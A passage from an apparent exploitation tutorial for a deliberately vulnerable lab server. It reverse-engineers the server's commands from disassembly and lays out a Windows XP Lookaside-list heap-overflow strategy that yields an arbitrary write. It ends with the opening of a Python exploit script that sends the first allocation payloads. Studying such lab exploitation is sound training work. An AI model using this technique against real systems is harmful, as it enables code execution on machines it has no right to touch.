    .text:00402070 mov     [esp+5A8h+param2], eax ; Source
    .text:00402074 mov     eax, [ebp+tempbuf]
    .text:0040207A mov     [esp+5A8h+param1], eax ; Dest
    .text:0040207D call    _strncpy
    .text:00402082 mov     [esp+5A8h+param3], 4096 ; Size
    .text:0040208A mov     [esp+5A8h+param2], 0 ; Val
    .text:00402092 mov     eax, [ebp+buf1]
    .text:00402095 mov     [esp+5A8h+param1], eax ; Dst
    .text:00402098 call    _memset
    .text:0040209D mov     eax, [ebp+tempbuf]
    .text:004020A3 mov     [esp+5A8h+param1], eax ; char *
    .text:004020A6 call    _Function2
    .text:004020AB mov     [esp+5A8h+param4], 0 ; flags
    .text:004020B3 mov     [esp+5A8h+param3], 11h ; len
    .text:004020BB mov     [esp+5A8h+param2], offset aKstetSuccessfu ; "KSTET SUCCESSFUL\n"
    .text:004020C3 mov     eax, [ebp+socket]
    .text:004020C9 mov     [esp+5A8h+param1], eax ; s
    .text:004020CC call    _send@16        ; send(x,x,x,x)
    .text:004020D1 sub     esp, 10h
    .text:004020D4 mov     [ebp+var_414], eax
    .text:004020DA jmp     loc_40258A
    

    Remarks: The command is interesting because the first 100 bytes of the user-submitted buffer are passed to Function2.

    GTER

    Similar to KSTET, the GTER command allocates a 180 byte buffer, tempbuf, on the default heap, populates it with the received input, and finally uses it as the first parameter to the Function1 call.

    .text:00402102 mov     [esp+5A8h+param1], 180 ; Size
    .text:00402109 call    _malloc
    .text:0040210E mov     [ebp+tempbuf], eax
    .text:00402114 mov     [esp+5A8h+param3], 1024 ; Size
    .text:0040211C mov     [esp+5A8h+param2], 0 ; Val
    .text:00402124 mov     eax, [ebp+buf2]
    .text:0040212A mov     [esp+5A8h+param1], eax ; Dst
    .text:0040212D call    _memset
    .text:00402132 mov     [esp+5A8h+param3], 180 ; Count
    .text:0040213A mov     eax, [ebp+buf1]
    .text:0040213D mov     [esp+5A8h+param2], eax ; Source
    .text:00402141 mov     eax, [ebp+tempbuf]
    .text:00402147 mov     [esp+5A8h+param1], eax ; Dest
    .text:0040214A call    _strncpy
    .text:0040214F mov     [esp+5A8h+param3], 4096 ; Size
    .text:00402157 mov     [esp+5A8h+param2], 0 ; Val
    .text:0040215F mov     eax, [ebp+buf1]
    .text:00402162 mov     [esp+5A8h+param1], eax ; Dst
    .text:00402165 call    _memset
    .text:0040216A mov     eax, [ebp+tempbuf]
    .text:00402170 mov     [esp+5A8h+param1], eax ; char *
    .text:00402173 call    _Function1
    .text:00402178 mov     [esp+5A8h+param4], 0 ; flags
    .text:00402180 mov     [esp+5A8h+param3], 14 ; len
    .text:00402188 mov     [esp+5A8h+param2], offset aGterOnTrack ; "GTER ON TRACK\n"
    .text:00402190 mov     eax, [ebp+socket]
    .text:00402196 mov     [esp+5A8h+param1], eax ; s
    .text:00402199 call    _send@16        ; send(x,x,x,x)
    .text:0040219E sub     esp, 10h
    .text:004021A1 mov     [ebp+var_414], eax
    .text:004021A7 jmp     loc_40258A
    

    The command will also result in buffers buf1 and buf2 being set to all zero bytes.

    Remarks: The command is interesting because the first 180 bytes of the user-submitted buffer are passed to the Function1 call.
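
    The remarks collected so far can be summarized as a small lookup table of which commands forward user data to which function, and how much of it. The sizes and function names come from the listings above; the Sink tuple and the helper functions are illustrative only.

```python
from collections import namedtuple

# command: name sent by the client
# function: callee that receives user-controlled data
# size: number of user-controlled bytes available to that callee
Sink = namedtuple("Sink", "command function size")

SINKS = [
    Sink("STATS", "Function4", 120),
    Sink("TRUN", "Function3", 3000),
    Sink("GMON", "Function3", 4096),
    Sink("KSTET", "Function2", 100),
    Sink("GTER", "Function1", 180),
]


def commands_reaching(function):
    """List the commands that pass user data to the given function."""
    return [s.command for s in SINKS if s.function == function]


def largest_input(function):
    """Largest user-controlled buffer any command passes to the function."""
    return max(s.size for s in SINKS if s.function == function)
```

    For instance, commands_reaching("Function3") returns TRUN and GMON, and largest_input("Function3") is 4096, which already suggests where the larger inputs end up.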

    HTER

    The HTER command is particularly interesting in terms of its user input manipulations. It begins by initializing a 2048 byte temporary buffer, tempbuf, on the default application heap:

    .text:004021CF mov     [esp+5A8h+param3], 3 ; Size
    .text:004021D7 mov     [esp+5A8h+param2], 0 ; Val
    .text:004021DF lea     eax, [ebp+Str]
    .text:004021E5 mov     [esp+5A8h+param1], eax ; Dst
    .text:004021E8 call    _memset
    .text:004021ED mov     [esp+5A8h+param1], 2048 ; Size
    .text:004021F4 call    _malloc
    .text:004021F9 mov     [ebp+tempbuf], eax
    .text:004021FF mov     [esp+5A8h+param3], 2048 ; Size
    .text:00402207 mov     [esp+5A8h+param2], 0 ; Val
    .text:0040220F mov     eax, [ebp+tempbuf]
    .text:00402215 mov     [esp+5A8h+param1], eax ; Dst
    .text:00402218 call    _memset
    .text:0040221D mov     [ebp+offset], 6 ; initialize offset (off-by-one)
    .text:00402227 mov     [ebp+tempoffset], 0
    

    Notice that the offset variable is initialized to the value 6 which is actually one more than necessary to separate the 5 bytes of the "HTER " command header from the remaining input. Next, the current and the following bytes are checked to make sure they are not null:

    .text:00402231
    .text:00402231 loc_402231:
    .text:00402231 mov     eax, [ebp+buf1]
    .text:00402234 add     eax, [ebp+offset]
    .text:0040223A cmp     byte ptr [eax], 0 ; check if the current byte is zero
    .text:0040223D jz      loc_4022DC
      :
    .text:00402243 mov     eax, [ebp+offset]
    .text:00402249 add     eax, [ebp+buf1]
    .text:0040224C inc     eax
    .text:0040224D cmp     byte ptr [eax], 0 ; check if the next byte is zero
    .text:00402250 jz      loc_4022DC
    

    If neither of the above checks triggers the jump, two bytes are retrieved from the receive buffer, buf1, and converted to an unsigned long integer using the strtoul function. The resulting one byte value is stored in tempbuf at the current tempoffset:

    .text:00402256 mov     [esp+5A8h+param3], 2 ; Size
    .text:0040225E mov     eax, [ebp+offset]
    .text:00402264 add     eax, [ebp+buf1]
    .text:00402267 mov     [esp+5A8h+param2], eax ; Src
    .text:0040226B lea     eax, [ebp+tempstr2] ; copy two bytes
    .text:00402271 mov     [esp+5A8h+param1], eax ; Dst
    .text:00402274 call    _memcpy
    .text:00402279 mov     [esp+5A8h+param3], 16 ; Radix
    .text:00402281 mov     [esp+5A8h+param2], 0 ; EndPtr
    .text:00402289 lea     eax, [ebp+tempstr2]
    .text:0040228F mov     [esp+5A8h+param1], eax ; Str
    .text:00402292 call    _strtoul        ; str -> unsigned long
    .text:00402297 mov     [ebp+tmpbuf2], eax
    .text:0040229D mov     [esp+5A8h+param3], 1 ; Size
    .text:004022A5 mov     eax, [ebp+tmpbuf2]
    .text:004022AB movzx   eax, al
    .text:004022AE mov     [esp+5A8h+param2], eax ; Val
    .text:004022B2 mov     eax, [ebp+tempoffset]
    .text:004022B8 add     eax, [ebp+tempbuf]
    .text:004022BE mov     [esp+5A8h+param1], eax ; Dst
    .text:004022C1 call    _memset
    .text:004022C6 lea     eax, [ebp+offset]
    .text:004022CC add     dword ptr [eax], 2
    .text:004022CF lea     eax, [ebp+tempoffset]
    .text:004022D5 inc     dword ptr [eax]
    .text:004022D7 jmp     loc_402231
    

    The above code block takes two characters like "AB" and converts them to the single byte 0xAB by parsing them as a base-16 number. This explains why the allocated tempbuf is exactly half the size of buf1: every two characters in buf1 are converted to one byte.
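
    The conversion loop can be approximated in a few lines of Python. This is only a sketch of the behavior described above, not the server's code: the name hter_decode is made up for illustration, and it assumes every character pair is valid hexadecimal (strtoul is more forgiving with malformed input).

```python
def hter_decode(buf, start=6):
    """Model of the HTER loop: decode hex character pairs from buf[start:]."""
    data = bytearray(buf)
    out = bytearray()
    offset = start  # the server starts at 6, one past the "HTER " header
    # The server stops as soon as the current or the next byte is null.
    while offset + 1 < len(data) and data[offset] != 0 and data[offset + 1] != 0:
        pair = bytes(data[offset:offset + 2]).decode("ascii")
        out.append(int(pair, 16) & 0xFF)  # keep the low byte only (movzx eax, al)
        offset += 2                       # two input characters per output byte
    return bytes(out)
```

    For example, hter_decode(b"HTER 041424344\x00") yields b"ABCD". Because the offset starts at 6, the first character after the space is skipped, so a padding character is needed to keep the pairs aligned.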

    After populating the tempbuf, the temporary buffer is passed to Function4 for processing:

    .text:004022DC loc_4022DC:
    .text:004022DC mov     eax, [ebp+tempbuf]
    .text:004022E2 mov     [esp+5A8h+param1], eax ; argstr
    .text:004022E5 call    _Function4
    .text:004022EA mov     [esp+5A8h+param3], 2048 ; Size
    .text:004022F2 mov     [esp+5A8h+param2], 0 ; Val
    .text:004022FA mov     eax, [ebp+tempbuf]
    .text:00402300 mov     [esp+5A8h+param1], eax ; Dst
    .text:00402303 call    _memset
    .text:00402308 mov     [esp+5A8h+param4], 0 ; flags
    .text:00402310 mov     [esp+5A8h+param3], 12h ; len
    .text:00402318 mov     [esp+5A8h+param2], offset aHterRunningFin ; "HTER RUNNING FINE\n"
    .text:00402320 mov     eax, [ebp+socket]
    .text:00402326 mov     [esp+5A8h+param1], eax ; s
    .text:00402329 call    _send@16        ; send(x,x,x,x)
    .text:0040232E sub     esp, 10h
    .text:00402331 mov     [ebp+var_414], eax
    .text:00402337 jmp     loc_40258A
    

    Remarks: The command may come in handy due to both the sheer size of the allocated buffer and a possible call to Function4.

    LTER

    If you found HTER functionality interesting, the LTER command makes even stranger manipulations to the received buffer. The code block begins by allocating a 4096 byte temporary buffer on the default heap and initializing it to all zeroes:

    .text:0040235F mov     [esp+5A8h+param1], 4096 ; Size
    .text:00402366 call    _malloc
    .text:0040236B mov     [ebp+tmpbuf2], eax
    .text:00402371 mov     [esp+5A8h+param3], 4096 ; Size
    .text:00402379 mov     [esp+5A8h+param2], 0 ; Val
    .text:00402381 mov     eax, [ebp+tmpbuf2]
    .text:00402387 mov     [esp+5A8h+param1], eax ; Dst
    .text:0040238A call    _memset
    .text:0040238F mov     [ebp+offset], 0
    

    Next, it enters a loop which continues until a null byte is encountered:

    .text:00402399 loc_402399:
    .text:00402399 mov     eax, [ebp+buf1]
    .text:0040239C add     eax, [ebp+offset]
    .text:004023A2 cmp     byte ptr [eax], 0
    .text:004023A5 jz      short loc_4023FB
      :
      :
    .text:004023F1 loc_4023F1:
    .text:004023F1 lea     eax, [ebp+offset]
    .text:004023F7 inc     dword ptr [eax]
    .text:004023F9 jmp     short loc_402399
    

    While iterating through the loop, the sign bit of the current byte is also checked:

    .text:004023A7 mov     eax, [ebp+buf1]
    .text:004023AA add     eax, [ebp+offset]
    .text:004023B0 cmp     byte ptr [eax], 0
    .text:004023B3 jns     short loc_4023D5 ; check the result is not signed
    .text:004023B3                          ; (MSB not set)
    

    This check makes sure that the most significant bit of the current byte is not set, which limits the bytes that are copied unchanged to the range 0x01 - 0x7F. The value 0x7F also happens to be the highest valid character in the ASCII table. If the byte is within these bounds, it is simply stored at the current offset in the tmpbuf2 buffer:

    .text:004023D5 loc_4023D5:
    .text:004023D5 mov     eax, [ebp+tmpbuf2]
    .text:004023DB mov     edx, [ebp+offset]
    .text:004023E1 add     edx, eax
    .text:004023E3 mov     eax, [ebp+buf1]
    .text:004023E6 add     eax, [ebp+offset]
    .text:004023EC movzx   eax, byte ptr [eax]
    .text:004023EF mov     [edx], al
    

    Otherwise, when the most significant bit is set, the byte is adjusted by subtracting 0x7F from it before it is stored in tmpbuf2:

    .text:004023B5 mov     eax, [ebp+tmpbuf2]
    .text:004023BB mov     edx, [ebp+offset]
    .text:004023C1 add     edx, eax
    .text:004023C3 mov     eax, [ebp+buf1]
    .text:004023C6 add     eax, [ebp+offset]
    .text:004023CC movzx   eax, byte ptr [eax]
    .text:004023CF sub     al, 7Fh
    .text:004023D1 mov     [edx], al
    .text:004023D3 jmp     short loc_4023F1
    

    After populating the temporary buffer, LTER enters another loop starting at the offset following the actual command string:

    .text:004023FB loc_4023FB:
    .text:004023FB mov     [ebp+offset], 5
    .text:00402405 loc_402405:
    .text:00402405 cmp     [ebp+offset], 4095
    .text:0040240F jg      short loc_40243C
      :
      :
    .text:00402432 loc_402432:
    .text:00402432 lea     eax, [ebp+offset]
    .text:00402438 inc     dword ptr [eax]
    .text:0040243A jmp     short loc_402405
    

    In the second loop a check is performed on whether or not the current byte is the '.' character. If this condition is satisfied, then the loop is terminated early and the Function3 is called with the entire tmpbuf2 as the first parameter:

    .text:00402411 mov     eax, [ebp+tmpbuf2]
    .text:00402417 add     eax, [ebp+offset]
    .text:0040241D cmp     byte ptr [eax], '.'
    .text:00402420 jnz     short loc_402432
    .text:00402422 mov     eax, [ebp+tmpbuf2]
    .text:00402428 mov     [esp+5A8h+param1], eax ; buf
    .text:0040242B call    _Function3
    .text:00402430 jmp     short loc_40243C
    

    Finally, regardless of the reason for loop termination, the temporary buffer is zeroed out and a confirmation message is sent to the user:

    .text:0040243C loc_40243C:             ; Size
    .text:0040243C mov     [esp+5A8h+param3], 4096
    .text:00402444 mov     [esp+5A8h+param2], 0 ; Val
    .text:0040244C mov     eax, [ebp+tmpbuf2]
    .text:00402452 mov     [esp+5A8h+param1], eax ; Dst
    .text:00402455 call    _memset
    .text:0040245A mov     [esp+5A8h+param4], 0 ; flags
    .text:00402462 mov     [esp+5A8h+param3], 0Eh ; len
    .text:0040246A mov     [esp+5A8h+param2], offset aLterComplete ; "LTER COMPLETE\n"
    .text:00402472 mov     eax, [ebp+socket]
    .text:00402478 mov     [esp+5A8h+param1], eax ; s
    .text:0040247B call    _send@16        ; send(x,x,x,x)
    .text:00402480 sub     esp, 10h
    .text:00402483 mov     [ebp+var_414], eax
    .text:00402489 jmp     loc_40258A
    

    Remarks: The command is interesting due to the large allocated space; however, its use may be limited by the restricted character range. If used to store shellcode, the shellcode must be ASCII-encoded. It may come in handy due to the call to Function3.
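
    To make the byte filter and the '.' trigger concrete, here is a small Python model of the two LTER loops. It is a sketch based only on the listings above; the function names are invented for illustration and the 4096-byte limit is taken from the loop bound in the disassembly.

```python
def lter_transform(buf):
    """Model of the first LTER loop: copy bytes until a null is found,
    subtracting 0x7F from every byte that has its top bit set."""
    out = bytearray()
    for b in bytearray(buf):
        if b == 0:
            break
        out.append(b - 0x7F if b & 0x80 else b)
    return bytes(out)


def lter_reaches_function3(buf):
    """Model of the second loop: scan offsets 5..4095 of the transformed
    buffer for '.', which is what triggers the call to Function3."""
    return b"." in lter_transform(buf)[5:4096]
```

    Two details fall out of the arithmetic: 0xFF maps to 0x80, so a transformed byte can still have its top bit set, and 0xAD maps to 0x2E ('.'), so lter_reaches_function3(b"LTER \xad") is true even though the input contains no literal dot.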

    KSTAN

    The KSTAN command is limited to displaying a predefined string without any user input processing:

    .text:004024AD mov     [esp+5A8h+param4], 0 ; flags
    .text:004024B5 mov     [esp+5A8h+param3], 0Fh ; len
    .text:004024BD mov     [esp+5A8h+param2], offset aKstanUnderway ; "KSTAN UNDERWAY\n"
    .text:004024C5 mov     eax, [ebp+socket]
    .text:004024CB mov     [esp+5A8h+param1], eax ; s
    .text:004024CE call    _send@16        ; send(x,x,x,x)
    .text:004024D3 sub     esp, 10h
    .text:004024D6 mov     [ebp+var_414], eax
    .text:004024DC jmp     loc_40258A
    

    Remarks: The command does not do anything interesting.

    EXIT

    The EXIT command does exactly what its name implies. It announces connection termination and closes the connection socket:

    .text:00402500 mov     [esp+5A8h+param4], 0 ; flags
    .text:00402508 mov     [esp+5A8h+param3], 8 ; len
    .text:00402510 mov     [esp+5A8h+param2], offset aGoodbye ; "GOODBYE\n"
    .text:00402518 mov     eax, [ebp+socket]
    .text:0040251E mov     [esp+5A8h+param1], eax ; s
    .text:00402521 call    _send@16        ; send(x,x,x,x)
    .text:00402526 sub     esp, 10h
    .text:00402529 mov     [ebp+var_414], eax
    .text:0040252F mov     [esp+5A8h+param1], offset aConnectionClos ; "Connection closing...\n"
    .text:00402536 call    _printf
    .text:0040253B mov     eax, [ebp+socket]
    .text:00402541 mov     [esp+5A8h+param1], eax ; s
    .text:00402544 call    _closesocket@4  ; closesocket(x)
    .text:00402549 sub     esp, 4
    .text:0040254C mov     [ebp+param5], 0
    .text:00402556 jmp     loc_40262D
    

    Remarks: The command may be useful to terminate the thread.

    UNKNOWN COMMAND

    The default command handler, where none of the aforementioned commands matched, simply announces the provided command is not known and loops back to receive another user request:

    .text:0040255B mov     [esp+5A8h+param4], 0
    .text:00402563 mov     [esp+5A8h+param3], 10h ; len
    .text:0040256B mov     [esp+5A8h+param2], offset aUnknownCommand ; "UNKNOWN COMMAND\n"
    .text:00402573 mov     eax, [ebp+socket]
    .text:00402579 mov     [esp+5A8h+param1], eax ; s
    .text:0040257C call    _send@16        ; send(x,x,x,x)
    .text:00402581 sub     esp, 10h
    .text:00402584 mov     [ebp+var_414], eax
    ; ---------------------------------------------------------------------------
    .text:0040258A loc_40258A:
    .text:0040258A cmp     [ebp+var_414], 0FFFFFFFFh
    .text:00402591 jnz     loc_401A74
    

    Remarks: The command does not do anything useful.

    Function X

    Now that we have analyzed all of the server commands, let's look at the four mystery Function X calls:

    Function 1

    The first function tokenizes the provided buffer using the ' ' character and copies the second token to the global variable a:

    .text:004017B3 mov     [esp+18h+param2], offset Delim ; " "
    .text:004017BB mov     eax, [ebp+arg_0]
    .text:004017BE mov     [esp+18h+param1], eax ; Str
    .text:004017C1 call    _strtok         ; get first token
    .text:004017C6 mov     [ebp+token], eax
    .text:004017C9 mov     [esp+18h+param2], offset Delim ; " "
    .text:004017D1 mov     [esp+18h+param1], 0 ; Str
    .text:004017D8 call    _strtok         ; get second token
    .text:004017DD mov     [ebp+token], eax
    .text:004017E0 mov     eax, [ebp+token]
    .text:004017E3 mov     [esp+18h+param2], eax ; Source
    .text:004017E7 mov     eax, ds:_a
    .text:004017EC mov     [esp+18h+param1], eax ; Dest
    .text:004017EF call    _strcpy         ; copy second token into a global var - a
    

    Remarks: The unsafe strcpy function may be used to overflow the buffer pointed to by the global variable a.
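
    Since all four functions start with the same two strtok calls, it helps to have a model of what "the second token" means. The helper below is a hypothetical Python approximation of that behavior for the single-space delimiter, not code from the server.

```python
def second_token(buf, delim=b" "):
    """Return the second delimiter-separated token of buf, or None if absent."""
    text = bytes(buf).split(b"\x00", 1)[0]        # C strings end at the first null
    tokens = [t for t in text.split(delim) if t]  # strtok skips runs of delimiters
    return tokens[1] if len(tokens) > 1 else None
```

    With this model, second_token(b"GTER AAAA BBBB") returns b"AAAA", and anything after a second space is ignored. A return value of None corresponds to strtok returning NULL; the listings above show no check for that case before the token is used.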

    Function 2

    Just like the one before it, the second function extracts the second token from the provided buffer using the ' ' character as the separator. However, instead of copying the value to the variable a, the length of the second token is used to allocate a heap chunk of the same size:

    .text:004017FC mov     [esp+18h+param2], offset Delim ; " "
    .text:00401804 mov     eax, [ebp+arg_0]
    .text:00401807 mov     [esp+18h+param1], eax ; Str
    .text:0040180A call    _strtok         ; get first token
    .text:0040180F mov     [ebp+token], eax
    .text:00401812 mov     [esp+18h+param2], offset Delim ; " "
    .text:0040181A mov     [esp+18h+param1], 0 ; Str
    .text:00401821 call    _strtok         ; get second token
    .text:00401826 mov     [ebp+token], eax
    .text:00401829 mov     eax, [ebp+token]
    .text:0040182C mov     [esp+18h+param1], eax ; Str
    .text:0040182F call    _strlen         ; second token length
    .text:00401834 mov     ds:_bufferlen, eax
    .text:00401839 mov     eax, ds:_bufferlen
    .text:0040183E mov     [esp+18h+param3], eax ; dwBytes
    .text:00401842 mov     [esp+18h+param2], 8 ; dwFlags
    .text:0040184A mov     eax, ds:_hHeap
    .text:0040184F mov     [esp+18h+param1], eax ; hHeap
    .text:00401852 call    _HeapAlloc@12   ; HeapAlloc(x,x,x)
    .text:00401857 sub     esp, 0Ch
    .text:0040185A mov     ds:_a, eax      ; a = HeapAlloc(token_len)
    

    Notice the use of the HeapAlloc call along with the private heap hHeap that we have created earlier.

    Remarks: By varying the size of the second token, we could make the application allocate arbitrary sized heap chunks.

    Function 3

    Following the established pattern, the third function begins by splitting up the string into tokens and obtaining the length of the second token:

    .text:00401867 mov     [esp+18h+param2], offset Delim ; " "
    .text:0040186F mov     eax, [ebp+arg_0]
    .text:00401872 mov     [esp+18h+param1], eax ; Str
    .text:00401875 call    _strtok         ; get first token
    .text:0040187A mov     [ebp+token], eax
    .text:0040187D mov     [esp+18h+param2], offset Delim ; " "
    .text:00401885 mov     [esp+18h+param1], 0 ; Str
    .text:0040188C call    _strtok         ; get second token
    .text:00401891 mov     [ebp+token], eax
    .text:00401894 mov     eax, [ebp+token]
    .text:00401897 mov     [esp+18h+param1], eax ; Str
    .text:0040189A call    _strlen         ; second token length
    .text:0040189F mov     ds:_bufferlen, eax
    

    However, in this case the length is used to allocate and immediately free a chunk on the private application heap:

    .text:004018A4 mov     eax, ds:_bufferlen
    .text:004018A9 mov     [esp+18h+param3], eax ; dwBytes
    .text:004018AD mov     [esp+18h+param2], 8 ; dwFlags
    .text:004018B5 mov     eax, ds:_hHeap
    .text:004018BA mov     [esp+18h+param1], eax ; hHeap
    .text:004018BD call    _HeapAlloc@12   ; HeapAlloc(x,x,x)
    .text:004018C2 sub     esp, 0Ch
    .text:004018C5 mov     ds:_b, eax      ; b = HeapAlloc(token_len)
    .text:004018CA mov     eax, ds:_b
    .text:004018CF mov     [esp+18h+param3], eax ; lpMem
    .text:004018D3 mov     [esp+18h+param2], 0 ; dwFlags
    .text:004018DB mov     eax, ds:_hHeap
    .text:004018E0 mov     [esp+18h+param1], eax ; hHeap
    .text:004018E3 call    _HeapFree@12    ; HeapFree(b)
    

    The pointer to the allocated heap chunk is stored in the global variable b.

    Remarks: The function may be used for a malloc/free primitive used in some heap exploitation scenarios.

    Function 4

    The last function in the series begins with the now familiar token and length routine:

    .text:004018F3 mov     [esp+18h+param2], offset Delim ; " "
    .text:004018FB mov     eax, [ebp+arg_0]
    .text:004018FE mov     [esp+18h+param1], eax ; Str
    .text:00401901 call    _strtok         ; get first token
    .text:00401906 mov     [ebp+token], eax
    .text:00401909 mov     [esp+18h+param2], offset Delim ; " "
    .text:00401911 mov     [esp+18h+param1], 0 ; Str
    .text:00401918 call    _strtok         ; get second token
    .text:0040191D mov     [ebp+token], eax
    .text:00401920 mov     eax, [ebp+token]
    .text:00401923 mov     [esp+18h+param1], eax ; Str
    .text:00401926 call    _strlen         ; second token length
    .text:0040192B mov     ds:_bufferlen, eax
    

    However, in this case two heap allocations are made using the token length as the heap chunk size parameter.

    .text:00401930 mov     eax, ds:_bufferlen
    .text:00401935 mov     [esp+18h+param3], eax ; dwBytes
    .text:00401939 mov     [esp+18h+param2], 8 ; dwFlags (HEAP_ZERO_MEMORY)
    .text:00401941 mov     eax, ds:_hHeap
    .text:00401946 mov     [esp+18h+param1], eax ; hHeap
    .text:00401949 call    _HeapAlloc@12   ; HeapAlloc(x,x,x)
    .text:0040194E sub     esp, 0Ch
    .text:00401951 mov     ds:_b, eax      ; b = HeapAlloc(token_len)
    .text:00401956 mov     eax, ds:_bufferlen
    .text:0040195B mov     [esp+18h+param3], eax ; dwBytes
    .text:0040195F mov     [esp+18h+param2], 8 ; dwFlags
    .text:00401967 mov     eax, ds:_hHeap
    .text:0040196C mov     [esp+18h+param1], eax ; hHeap
    .text:0040196F call    _HeapAlloc@12   ; HeapAlloc(x,x,x)
    .text:00401974 sub     esp, 0Ch
    .text:00401977 mov     ds:_c, eax      ; c = HeapAlloc(token_len)
    

    Also, the value of the second token is copied to the address pointed to by the global variable c (second allocation):

    .text:0040197C mov     eax, [ebp+token]
    .text:0040197F mov     [esp+18h+param2], eax ; Source
    .text:00401983 mov     eax, ds:_c
    .text:00401988 mov     [esp+18h+param1], eax ; Dest
    .text:0040198B call    _strcpy         ; copy second token to c
    

    While the application uses an unsafe function strcpy, an appropriately sized buffer is dynamically created to accommodate the input string.

    Remarks: The function may be used to allocate and populate arbitrary sized heap chunks on the private heap.

    Exploitation

    With a better understanding of the application's functionality, let's review all the previously made remarks about potential vulnerabilities and devise a strategy for exploiting them.

    Vulnerability

    The call to strcpy in Function 1 is potentially vulnerable, because it copies arbitrarily sized user input to a fixed-size buffer on the heap. The destination buffer is first allocated by Function 2; however, the strcpy call occurs in a separate function without any knowledge of the buffer size. As a result, if the user buffer in the Function 1 call is larger than the one used to allocate the buffer in the Function 2 call, then the application is indeed vulnerable to a heap overflow and may be exploitable under certain conditions.
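
    The size mismatch can be expressed as a quick calculation. The sketch below is illustrative only: overflow_bytes is a made-up helper, and it assumes the usable space of a chunk is the requested size rounded up to the 8-byte heap granularity.

```python
def overflow_bytes(alloc_token, copy_token, granularity=8):
    """Bytes written past chunk A's usable space by Function 1's strcpy."""
    # Assumption: usable space is the requested size rounded up to 8 bytes.
    blocks = max(1, (len(alloc_token) + granularity - 1) // granularity)
    usable = blocks * granularity
    written = len(copy_token) + 1  # strcpy also copies the terminating null
    return max(0, written - usable)
```

    Under that assumption, allocating with an 8-byte token and then copying a 20-byte token writes 13 bytes past the end of chunk A: enough to cover the next chunk's 8-byte header, the 4 bytes that follow it, and the terminating null.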

    Exploitation Strategy

    At this point we must decide on the exploitation strategy to turn the above heap overflow vulnerability into arbitrary code execution.

    The target platform for the exploitation is Windows XP Service Pack 3, so the classic unlink() method is not going to work. However, the frontend allocator in this version of Windows uses a singly-linked Lookaside list which lacks many of the security mechanisms, such as safe unlinking and heap cookie checks. As described in great detail in Heap Overflows For Humans - 102, through careful manipulation of the heap, an attacker can cause a subsequent allocation to occur at an arbitrary address. As a result, it may be possible to overwrite an attacker-chosen memory area with arbitrary data.

    Below are the exact heap manipulations required to exploit the Lookaside list:

    1. Allocate chunk A.
    2. Allocate chunk B of the same size as chunk A.
    3. Free chunk B so that it is placed on the Lookaside list.
    4. Overflow chunk A into chunk B to overwrite chunk B's flink pointer with a target address to overwrite.
    5. Allocate chunk B again. This will cause corruption of the Lookaside's head flink pointer, so that the next allocation will return the target address.
    6. Allocate chunk C which will get the target address.
    7. Write arbitrary data to the target address.
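
    The steps above can be illustrated with a toy model of a single Lookaside bucket. This is a deliberately simplified sketch, not the Windows allocator: the class, the method names, and the default chunk address are placeholders, and unmapped addresses simply read as 0 instead of faulting.

```python
class ToyLookaside(object):
    """Toy model of one Lookaside bucket: a LIFO singly-linked free list."""

    def __init__(self):
        self.head = 0     # address of the first free chunk, 0 means empty
        self.flinks = {}  # address -> flink stored in that chunk's user data

    def free(self, addr):
        """Push a chunk: its flink takes the old head, then it becomes the head."""
        self.flinks[addr] = self.head
        self.head = addr

    def alloc(self):
        """Pop a chunk: return the head and follow its flink without validation."""
        addr = self.head
        if addr == 0:
            return None   # empty bucket; a real allocator would use the back end
        # Unmapped addresses read as 0 here; the real allocator would fault.
        self.head = self.flinks.get(addr, 0)
        return addr


def simulate(target, chunk_b=0x00491EA0):
    """Run steps 3 to 6 and return the two addresses handed out."""
    bucket = ToyLookaside()
    bucket.free(chunk_b)             # step 3: chunk B goes onto the list
    bucket.flinks[chunk_b] = target  # step 4: overflow rewrites B's flink
    first = bucket.alloc()           # step 5: B is returned, head = target
    second = bucket.alloc()          # step 6: chunk C lands on the target
    return first, second
```

    Calling simulate(0x43434343) returns the original chunk B address followed by 0x43434343, which is the behavior the exploit relies on: the second allocation is placed wherever the corrupted flink points.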

    Looking at the heap allocation and write primitives made available to us by Functions 1-4, we can trigger all of the above conditions and overwrite an arbitrary address with arbitrary data as follows:

    1. Function 2 can be used to allocate a fixed size chunk A to satisfy Step 1.
    2. Function 3 can be used to allocate and immediately free chunk B with the same size as chunk A. This will satisfy Steps 2 and 3 as long as the Lookaside list for the particular size is empty and the chunk size is below 1016 bytes.
    3. Function 1 can be used to overflow chunk A and overwrite the flink pointer in the recently freed chunk B. This operation will satisfy Step 4.
    4. Function 4 can be used to allocate chunk B again, resulting in a corrupted Lookaside header for the particular size. The same function will then allocate chunk C and fill it with the supplied user data. Function 4 therefore satisfies Steps 5, 6, and 7.

    The next part of the strategy is deciding which of the commands supported by the server can be used to trigger all four functions in that order. Based on the reverse engineering session above we can build a map of which commands result in function executions:

    • Function 1 is called by the GTER command.
    • Function 2 is called by the KSTET command.
    • Function 3 is called by the TRUN, GMON, and LTER commands.
    • Function 4 is called by the STATS and HTER commands.

    We don't have much choice regarding the first two functions; however, I have decided to use GMON and STATS to call Function 3 and Function 4 respectively due to their relative simplicity compared to the others.
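
    The mapping and the chosen order can be written down as data, which is convenient when experimenting with alternative commands later. The names below are illustrative and not part of the original exploit script.

```python
# Which server commands reach which function, per the analysis above.
FUNCTION_CALLERS = {
    1: ["GTER"],
    2: ["KSTET"],
    3: ["TRUN", "GMON", "LTER"],
    4: ["STATS", "HTER"],
}

# The commands picked in this article where there is a choice.
PREFERRED = {3: "GMON", 4: "STATS"}

# Order in which the functions must run: allocate A, alloc/free B,
# overflow A, then allocate B and C.
CALL_ORDER = [2, 3, 1, 4]


def command_sequence():
    """Return the commands to send, in order, for the Lookaside attack."""
    return [PREFERRED.get(f, FUNCTION_CALLERS[f][0]) for f in CALL_ORDER]
```

    With the choices made here, command_sequence() evaluates to KSTET, GMON, GTER, STATS.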

    Smashing Lookaside

    Let's begin developing the exploit by crafting a simple connection script:

    #!/usr/bin/env python
    import sys, socket
    from struct import pack
    from binascii import hexlify
    
    HOST = sys.argv[1]
    PORT = 9999
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    
    print "%s" % s.recv(1024)
    
    s.sendall("EXIT")
    print "%s" % s.recv(1024)
    
    s.close()
    

    The script will simply connect to the server and issue a single EXIT command. Here is the output:

    Welcome to Heap Vulnerable Server! Enter HELP for h
    GOODBYE
    

    Now, let's allocate chunk A with the KSTET command and allocate/free chunk B with the GMON command using the following payload:

    # 1) Allocate chunk A
    s.sendall("KSTET " + "A"*8)
    print "%s" % s.recv(1024)
    
    # 2) Allocate and free chunk B
    s.sendall("GMON " + "A"*8)
    print "%s" % s.recv(1024)
    

